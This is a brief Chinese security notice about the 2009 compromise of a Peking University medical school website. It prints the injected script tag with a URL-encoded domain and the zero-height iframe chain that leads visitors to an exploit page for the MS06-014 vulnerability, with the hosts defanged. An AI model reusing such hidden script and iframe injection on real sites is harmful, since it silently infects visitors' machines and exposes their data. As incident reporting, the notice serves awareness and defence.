北大基础医学院网站遭黑客挂马

2009年4月13日，北京大学基础医学院网站(hxxp://medicine1.bjmu.edu.cn/)被黑客植入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用 ...     2009年4月13日，北京大学基础医学院网站(hxxp://medicine1.bjmu.edu.cn/)被黑客植入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。

该网站问题代码：

						<script src=hxxp://%6D%62%72%39%2E%63%6E></script>

hxxp://mbr9.cn问题框架代码：

　　document.write("<iframe src=hxxp://z.hg973.cn/d1/16/index.htm width=100 height=0></Iframe>")

hxxp://z.hg973.cn/d1/16/index.htm问题框架代码：

						<iframe src=index2.htm width=100 height=0></Iframe>

hxxp://z.hg973.cn/d1/16/index2.htm网马代码：

该网马利用以下漏洞来传播：

MS06014漏洞

关键字：黑客挂马